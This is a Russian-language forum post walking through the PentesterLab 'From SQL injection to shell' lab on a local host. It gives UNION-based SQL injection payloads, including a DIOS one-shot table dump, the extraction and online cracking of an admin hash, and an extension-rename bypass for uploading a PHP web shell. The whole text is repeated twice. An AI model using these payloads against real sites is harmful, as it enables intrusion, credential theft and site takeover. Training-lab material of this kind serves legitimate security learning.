Mister_Bert0ni
28.05.2015, 22:07
Тем кто в теме врятли что то новое увидет здесь.Поэтому гамнокритика мне не нужна в коментах.Хотите срать - срите в отведенных для этого местах.
И так сегодня наша тема "От SQL иньекции до WebShell-а"
Будем учиться на тренировачной площадке - я скачал ее с
https://pentesterlab.com/exercises/from_sqli_to_shell
Для видео ее будет достотачно.
И так начнем.
Первое что нам нужно найти уязвимый параметр.В нашем случае это параметр id.
http://192.168.8.131/cat.php?id=1'
Теперь пробуем сбалансировать запрос:
http://192.168.8.131/cat.php?id=1-- -
Ищем количество столбцов:
Находим:
http://192.168.8.131/cat.php?id=1 order by 4-- -
Ищем уязвимые столбцы:
http://192.168.8.131/cat.php?id=.1 union select 1,2,3,4 -- -
Проверимь базу,версию,
http://192.168.8.131/cat.php?id=.1 union select 1,concat(database(),0x20,version()),3,4-- -
Ищем админку:
Нашли
http://192.168.8.131/admin
Будем пробовать получить доступ к админке...
Пробуем разкрутить скуль и получить login pass админа.
Для экономии времени я буду юзать DIOS (Dump In One Shot) c помощью которого можно быстро получить список всех таблиц в один запрос:
make_set(6,@:=0x0a,(select(1)from(information_sche ma.columns)where@:=make_set(511,@,0x3a,table_schem a,0x3c6c693e,table_name,column_name)),@)
И так наш запрос будет следующим:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(informa tion_schema.columns)where@:=make_set(511,@,0x3a,ta ble_schema,0x3c6c693e,table_name,column_name)),@)) ,3,4-- -
Ищем таблицу с юзерами...
таблица: users , колонки: login и password
получим даные с этих столбцов:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(users)w here@:=make_set(511,@,0x3a,login,0x203a3a3a20,pass word)),@)),3,4-- -
Получили логин:admin и пароль в хэше:8efe310f9ab3efeae8d410a8e0166eb2
Первым делом идем на первый онлайн сервис по расшифровки хэша:
В моем случае это:
http://hashkiller.co.uk/md5-decrypter.aspx
пробуем расшифровать наш хэш:
Нам повезло)) Пароль расшифрован)
Пароль4ssw0rd
Итак идем в админку.
Зашли и ищем там страницу для загрузки контента(картники,новости, узыку и т.д...)
http://192.168.8.131/admin/new.php
ПРобуем загрузить наш шелл...
Говорит NO PHP! (((
Ну ничего,есть много способов обхода этого фильтра.Сейчас я о них рассказивать не буду - для этого я поже сниму отдельное видео по этой теме..
Для обхода этого фильтра в нашей ситуации достаточно переименовать наш shell.php в shell.php3 или shell.php4 или shell.php5
И так пробуем:
Ура мы залились)
Всем спасибо )) С вами был Mister_Bert0ni)
И так сегодня наша тема "От SQL иньекции до WebShell-а"
Будем учиться на тренировачной площадке - я скачал ее с
https://pentesterlab.com/exercises/from_sqli_to_shell
Для видео ее будет достотачно.
И так начнем.
Первое что нам нужно найти уязвимый параметр.В нашем случае это параметр id.
http://192.168.8.131/cat.php?id=1'
Теперь пробуем сбалансировать запрос:
http://192.168.8.131/cat.php?id=1-- -
Ищем количество столбцов:
Находим:
http://192.168.8.131/cat.php?id=1 order by 4-- -
Ищем уязвимые столбцы:
http://192.168.8.131/cat.php?id=.1 union select 1,2,3,4 -- -
Проверимь базу,версию,
http://192.168.8.131/cat.php?id=.1 union select 1,concat(database(),0x20,version()),3,4-- -
Ищем админку:
Нашли
http://192.168.8.131/admin
Будем пробовать получить доступ к админке...
Пробуем разкрутить скуль и получить login pass админа.
Для экономии времени я буду юзать DIOS (Dump In One Shot) c помощью которого можно быстро получить список всех таблиц в один запрос:
make_set(6,@:=0x0a,(select(1)from(information_sche ma.columns)where@:=make_set(511,@,0x3a,table_schem a,0x3c6c693e,table_name,column_name)),@)
И так наш запрос будет следующим:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(informa tion_schema.columns)where@:=make_set(511,@,0x3a,ta ble_schema,0x3c6c693e,table_name,column_name)),@)) ,3,4-- -
Ищем таблицу с юзерами...
таблица: users , колонки: login и password
получим даные с этих столбцов:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(users)w here@:=make_set(511,@,0x3a,login,0x203a3a3a20,pass word)),@)),3,4-- -
Получили логин:admin и пароль в хэше:8efe310f9ab3efeae8d410a8e0166eb2
Первым делом идем на первый онлайн сервис по расшифровки хэша:
В моем случае это:
http://hashkiller.co.uk/md5-decrypter.aspx
пробуем расшифровать наш хэш:
Нам повезло)) Пароль расшифрован)
Пароль4ssw0rd
Итак идем в админку.
Зашли и ищем там страницу для загрузки контента(картники,новости, узыку и т.д...)
http://192.168.8.131/admin/new.php
ПРобуем загрузить наш шелл...
Говорит NO PHP! (((
Ну ничего,есть много способов обхода этого фильтра.Сейчас я о них рассказивать не буду - для этого я поже сниму отдельное видео по этой теме..
Для обхода этого фильтра в нашей ситуации достаточно переименовать наш shell.php в shell.php3 или shell.php4 или shell.php5
И так пробуем:
Ура мы залились)
Всем спасибо )) С вами был Mister_Bert0ni)